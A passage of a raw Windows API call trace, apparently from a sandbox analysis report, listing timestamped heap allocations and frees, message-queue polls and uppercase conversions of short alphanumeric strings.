RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bf8 [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d48 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0b0 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ce8 [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bf8 | out: hHeap=0x2af0000) returned 1 [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.525] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0210.525] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0210.525] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.525] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9a8 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.526] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d18 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c58 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0210.526] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0210.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0210.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.526] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.526] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.526] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0210.527] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c18 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0210.527] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782f0 | out: hHeap=0x2af0000) returned 1 [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ca8 | out: hHeap=0x2af0000) returned 1 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0e0 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74628 [0210.527] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c08 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c08 | out: hHeap=0x2af0000) returned 1 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d28 [0210.527] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0210.527] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.527] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0210.528] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0210.528] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74628 | out: hHeap=0x2af0000) returned 1 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d28 [0210.528] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab038 [0210.528] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d28 | out: hHeap=0x2af0000) returned 1 [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0210.529] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0210.529] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c88 [0210.529] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78430 | out: hHeap=0x2af0000) returned 1 [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c88 | out: hHeap=0x2af0000) returned 1 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aab0b0 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74040 [0210.529] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bd8 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaee8 [0210.529] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71cb8 [0210.529] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0210.529] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78200 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaee8 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0210.530] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0210.530] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaed0 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d58 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.530] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0210.530] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.531] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74040 | out: hHeap=0x2af0000) returned 1 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.531] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0210.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0210.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0210.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0210.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cc8 | out: hHeap=0x2af0000) returned 1 [0210.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e840 [0210.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.531] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0210.531] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0210.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71cc8 [0210.531] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0210.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaed0 [0210.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d08 [0210.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0210.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71d18 [0210.532] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaae70 [0210.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0210.532] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.532] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71c28 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d58 | out: hHeap=0x2af0000) returned 1 [0210.532] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c28 | out: hHeap=0x2af0000) returned 1 [0210.532] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0210.532] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 1 [0210.532] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab038 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d18 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d08 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71cb8 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c68 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c58 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0b0 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0210.533] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bd8 | out: hHeap=0x2af0000) returned 